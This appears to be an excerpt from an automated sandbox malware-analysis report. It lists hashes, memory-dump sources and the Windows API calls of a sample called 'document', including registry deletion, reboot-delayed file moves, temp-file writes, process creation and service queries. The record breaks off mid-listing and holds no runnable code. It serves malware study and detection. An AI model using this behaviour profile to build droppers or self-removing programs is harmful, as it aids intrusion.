                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: "$'$($/$/$0$1$2$4$6$:$?$F$U$Y$Z$b$c$c$c$d$h$i$o$t$t$v$y$y$z${${
                                                                  • API String ID: 0-1086536751
                                                                  • Opcode ID: b412046be1c6318884bb58681997ee504ed99bbc7bdc58cc31c50f8f500c8cb2
                                                                  • Instruction ID: 11e3b4fdb97899335a1116277c19ae4b67f777c444ac700ec2618231df2b17f2
                                                                  • Opcode Fuzzy Hash: b412046be1c6318884bb58681997ee504ed99bbc7bdc58cc31c50f8f500c8cb2
                                                                  • Instruction Fuzzy Hash: 9AD1492010C7C19ED322DB79984865FBFD45BA6218F485F9DF1E44B3E3D2A9810AC76B

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004150AB
                                                                    • Part of subcall function 00413AD0: SetEvent.KERNEL32(0000011C,?,00000000,00000001,00415108), ref: 0041EF12
                                                                    • Part of subcall function 00413AD0: SetEvent.KERNEL32(00000128), ref: 0041EF20
                                                                    • Part of subcall function 00413AD0: SetEvent.KERNEL32(0000012C), ref: 0041EF2B
                                                                    • Part of subcall function 00413AD0: SetEvent.KERNEL32(00000124), ref: 0041EF36
                                                                    • Part of subcall function 00413AD0: SetEvent.KERNEL32(00000120), ref: 0041EF41
                                                                    • Part of subcall function 004120C0: ExpandEnvironmentStringsA.KERNEL32(00000006,?,00000104,00000001), ref: 004121E0
                                                                    • Part of subcall function 004120C0: GetFileAttributesA.KERNEL32(?), ref: 004121FF
                                                                    • Part of subcall function 00413DD0: Sleep.KERNEL32(0002BF20,00000000), ref: 00413E62
                                                                    • Part of subcall function 00412B30: ExpandEnvironmentStringsA.KERNEL32(00000006,?,00000104,00000000), ref: 00412C26
                                                                    • Part of subcall function 00412B30: GetLocalTime.KERNEL32(0000003C), ref: 00412C31
                                                                    • Part of subcall function 00412B30: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00412C4B
                                                                    • Part of subcall function 00412B30: WriteFile.KERNEL32(00000000,000000E6,00000010,0000003C,00000000), ref: 00412C62
                                                                    • Part of subcall function 00412B30: CloseHandle.KERNEL32(00000000), ref: 00412C69
                                                                    • Part of subcall function 00413280: RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00413420
                                                                    • Part of subcall function 00413280: RegDeleteValueA.ADVAPI32(?,?), ref: 00413451
                                                                    • Part of subcall function 00413280: RegCloseKey.ADVAPI32(?), ref: 0041345C
                                                                    • Part of subcall function 00413280: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00413472
                                                                    • Part of subcall function 00413280: MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0041348A
                                                                    • Part of subcall function 0041EF50: ResetEvent.KERNEL32(0000011C,?,00000000,00000001,00415134), ref: 0041EF67
                                                                    • Part of subcall function 0041EF50: ResetEvent.KERNEL32(00000128), ref: 0041EF76
                                                                    • Part of subcall function 0041EF50: ResetEvent.KERNEL32(0000012C), ref: 0041EF81
                                                                    • Part of subcall function 0041EF50: ResetEvent.KERNEL32(00000124), ref: 0041EF8C
                                                                    • Part of subcall function 0041EF50: ResetEvent.KERNEL32(00000120), ref: 0041EF97
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Event$File$Reset$CloseEnvironmentExpandModuleNameStrings$AttributesCreateDeleteHandleLocalMoveOpenSleepTimeValueWrite
                                                                  • String ID: $'$0$1$4$:$<$D$F$O$V$Y$^$_$h$m$s$t$x$x$x$z${$}
                                                                  • API String ID: 2834431147-455679219
                                                                  • Opcode ID: 1f6e772e3f605208dfee7bf4d0ea2b6ea15f5f842e9da9fe72f42dc6b594ce41
                                                                  • Instruction ID: 303c94e765967613df6afeb7444a04bb2175ba7380c9a58d85960b8bb2ad4b0c
                                                                  • Opcode Fuzzy Hash: 1f6e772e3f605208dfee7bf4d0ea2b6ea15f5f842e9da9fe72f42dc6b594ce41
                                                                  • Instruction Fuzzy Hash: 8AE1482120C7C089D33297399848BDBBFD55FE6318F584A9EE1E88B2D3C6B58149C767

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,00000000,?,0000007B), ref: 00412643
                                                                  • GetTempFileNameA.KERNELBASE(?,0042E292,00000000,?,?,0000007B), ref: 00412660
                                                                    • Part of subcall function 0040C1D0: GetTickCount.KERNEL32 ref: 0040C1DA
                                                                    • Part of subcall function 0040C1D0: GetTickCount.KERNEL32 ref: 0040C1E8
                                                                    • Part of subcall function 0040C1D0: GetTickCount.KERNEL32 ref: 0040C1F6
                                                                    • Part of subcall function 0040C1D0: GetTickCount.KERNEL32 ref: 0040C204
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,0000007B), ref: 00412681
                                                                  • HeapAlloc.KERNEL32(00000000,?,0000007B), ref: 00412684
                                                                  • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,0000007B), ref: 004126C6
                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,0000007B), ref: 004126D8
                                                                  • CloseHandle.KERNEL32(00000000,?,0000007B), ref: 004126E5
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,0000007B), ref: 004126EA
                                                                  • HeapFree.KERNEL32(00000000,?,0000007B), ref: 004126ED
                                                                  • ExpandEnvironmentStringsA.KERNELBASE(0000004F,?,00000208), ref: 00412920
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CountHeapTick$File$Process$AllocCloseCreateCurrentDirectoryEnvironmentExpandFreeHandleNameStringsTempWrite
                                                                  • String ID: '$)$4$7$<$A$D$I$K$N$O$W$\$_$j$x
                                                                  • API String ID: 1204127460-4239860483
                                                                  • Opcode ID: e9142f7ef01560981e5ace9b92d93c22cb7fba4bdb225b2538245e4787c0e303
                                                                  • Instruction ID: fc50ba5ee65d84b0438dc11ee2d5e43eb154a7910d067eaa4cf43abc5e739b9a
                                                                  • Opcode Fuzzy Hash: e9142f7ef01560981e5ace9b92d93c22cb7fba4bdb225b2538245e4787c0e303
                                                                  • Instruction Fuzzy Hash: 03A15E2110C7C19ED33197399889BDBBFD45FA7214F184AADE2E8872D3C6B5440ACB67

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32 ref: 00421C2A
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00421C2D
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,000000A2,00000000,00000001,00000000), ref: 00421C48
                                                                  • GetLastError.KERNEL32 ref: 00421C58
                                                                  • RegQueryValueExA.ADVAPI32(?,00000057,00000000,00000000,00000000,?), ref: 00421C77
                                                                  • GetLastError.KERNEL32 ref: 00421C81
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00431D8C,?,?,?,?,?,00000001), ref: 00421D20
                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 00421D23
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000001), ref: 00421D2E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$ErrorLastProcess$AllocCloseFreeOpenQueryValue
                                                                  • String ID: #$$$&$)$*$;$>$H$N$R$S$T$V$W$^$r$s$t$u
                                                                  • API String ID: 1434707997-1823157150
                                                                  • Opcode ID: 6e08b74d57cc105e2010b4ea5f959d3cf0c0668fc3babe88880cece8b4c20fe2
                                                                  • Instruction ID: fa9cfd876d3b6e4b553c796e2fcc97387f4aba46f10f049a185be6cbd934e7b4
                                                                  • Opcode Fuzzy Hash: 6e08b74d57cc105e2010b4ea5f959d3cf0c0668fc3babe88880cece8b4c20fe2
                                                                  • Instruction Fuzzy Hash: E1A17A6110D3C19ED322DB79A884B9BBFD45FA6208F481EADF0D487393D2A5C108C76B

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,000000FF,?), ref: 0041FBF0
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041FBF7
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000006,00000000,00000001,74DF0A60), ref: 0041FC14
                                                                  • GetLastError.KERNEL32 ref: 0041FC24
                                                                  • RegQueryValueExA.ADVAPI32(?,000000E5,00000000,00000000,00000000,?), ref: 0041FC40
                                                                  • GetLastError.KERNEL32 ref: 0041FC4A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHeapLast$AllocOpenProcessQueryValue
                                                                  • String ID: Z$c$d$i$t$v$y${
                                                                  • API String ID: 1776519057-3640894087
                                                                  • Opcode ID: f6d11a2ddb12440592e01084a58bb70fe86f7cf8f6f4206307d0c26f565b6ce2
                                                                  • Instruction ID: 17e8e7697b2e3bef17a3567bbfa0b456d59c673bdf2ae35ddef1ee050250fe48
                                                                  • Opcode Fuzzy Hash: f6d11a2ddb12440592e01084a58bb70fe86f7cf8f6f4206307d0c26f565b6ce2
                                                                  • Instruction Fuzzy Hash: 7351CF7110C3C08ED311DB689855B9BFFE5AF99708F044E6EE1C587292D7B98109CB6B

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,80000000,00000000,?,?,?,?,?,?,?,0041FCCD,?,00431CAC), ref: 0041F02D
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0041FCCD,?,00431CAC,?,?,?,?,?,00000001), ref: 0041F039
                                                                  • OpenServiceA.ADVAPI32(00000000,?,00000004,00431C98,?,?,?,?,?,?,?,0041FCCD,?,00431CAC), ref: 0041F057
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0041FCCD,?,00431CAC,?,?,?,?,?,00000001), ref: 0041F063
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,0041FCCD,?,00431CAC), ref: 0041F070
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastOpenService$CloseHandleManager
                                                                  • String ID:
                                                                  • API String ID: 48634454-0
                                                                  • Opcode ID: a2892d7f7661b13cf73e8cd547c792104bc9d4b467d401adbc5d1c83def5ba12
                                                                  • Instruction ID: f3cf9168e74de08882df1071f672c22a0612c2c306f6c0820370a697ac743aba
                                                                  • Opcode Fuzzy Hash: a2892d7f7661b13cf73e8cd547c792104bc9d4b467d401adbc5d1c83def5ba12
                                                                  • Instruction Fuzzy Hash: 27217C36701220ABD321AB69DC49B9F7BE4EFD9750F80442AFA41D7350D7B09847CBA6

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNELBASE(0000004F,?,00000208), ref: 00412920
                                                                  • lstrcatA.KERNEL32(?,0042E3F8), ref: 00412939
                                                                  • lstrcatA.KERNEL32(?,?), ref: 0041294B
                                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00412989
                                                                  • CloseHandle.KERNEL32(?), ref: 00412994
                                                                  • CloseHandle.KERNEL32(?), ref: 0041299B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandlelstrcat$CreateEnvironmentExpandProcessStrings
                                                                  • String ID: D
                                                                  • API String ID: 249013821-2746444292
                                                                  • Opcode ID: d510ec59f7870d519bf324aab472407a7ecdcd160f1fdcfa20edfd7c1420eeda
                                                                  • Instruction ID: 1d206c3ebca1a40486939c7928fd3c0a5193cdd2c06ff6f9138d119af16f5955
                                                                  • Opcode Fuzzy Hash: d510ec59f7870d519bf324aab472407a7ecdcd160f1fdcfa20edfd7c1420eeda
                                                                  • Instruction Fuzzy Hash: 74315E7610C3845BD321AB29A494BEBFBE9AFD6218F288DBDD5C4C3243D6718409CB57
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(mscoree.dll,004292FE,?,0042EAB8,00000008,00429335,?,00000001,00000000,00426648,00000003), ref: 00429195
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004291A5
                                                                  • ExitProcess.KERNEL32 ref: 004291B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressExitHandleModuleProcProcess
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 75539706-1276376045
                                                                  • Opcode ID: 8c2fa50a3ec66fd577a0b8e8636169e5e6d711be195023716ce747e76f4f0db8
                                                                  • Instruction ID: 837725cd5bd8d62ceb7a805311689d2544094357cd19b3e86fc30850f48944c8
                                                                  • Opcode Fuzzy Hash: 8c2fa50a3ec66fd577a0b8e8636169e5e6d711be195023716ce747e76f4f0db8
                                                                  • Instruction Fuzzy Hash: BBD0E730344321EBE6111B73ED1D77B7A65BF41B41B944439B845D0160DB75CC21991D
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 0041230F
                                                                  • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00412329
                                                                  • SetFilePointer.KERNELBASE(00000000,000000FC,00000000,00000002), ref: 00412353
                                                                  • ReadFile.KERNELBASE ref: 00412370
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412377
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandleModuleNamePointerRead
                                                                  • String ID:
                                                                  • API String ID: 1352878660-0
                                                                  • Opcode ID: 287adf819acc85caeaf54933d95270eb436911dfc7abba11b07640b1e6699bc0
                                                                  • Instruction ID: c542780b36d63bd1f74abcbd7efe17dbbb97c44db4b19d55b56e5dd6763cd24b
                                                                  • Opcode Fuzzy Hash: 287adf819acc85caeaf54933d95270eb436911dfc7abba11b07640b1e6699bc0
                                                                  • Instruction Fuzzy Hash: 0C11A171644360ABE324EB65EC46FEA33A8BB89710F800929F761961D0D7F45644CB9B
                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00431E18,00000000,00000000,00431CAC,00431C98,0041FCDD,?,00431CAC,?,00431CAC,?,?,?,?,?,00000001), ref: 0041F111
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 0041F11D
                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,00000001), ref: 0041F135
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 0041F140
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateErrorEventHandleLastObjectSingleWait
                                                                  • String ID:
                                                                  • API String ID: 5396149-0
                                                                  • Opcode ID: 7fabdc887b76636cf33a9a3860f0f978fa08689d0529247d9dc893de2f94b650
                                                                  • Instruction ID: 41ec93761c571e6fbe91694ad29752271d04f397154ed630bd7477d7537eb11e
                                                                  • Opcode Fuzzy Hash: 7fabdc887b76636cf33a9a3860f0f978fa08689d0529247d9dc893de2f94b650
                                                                  • Instruction Fuzzy Hash: 1CF01D35344220AFD3619F65DC48BABB7A4EF56311F018836FD458B390CB74AC52CBA5
                                                                  APIs
                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,00425E5F,00000001,?,0042E598,00000060), ref: 00428480
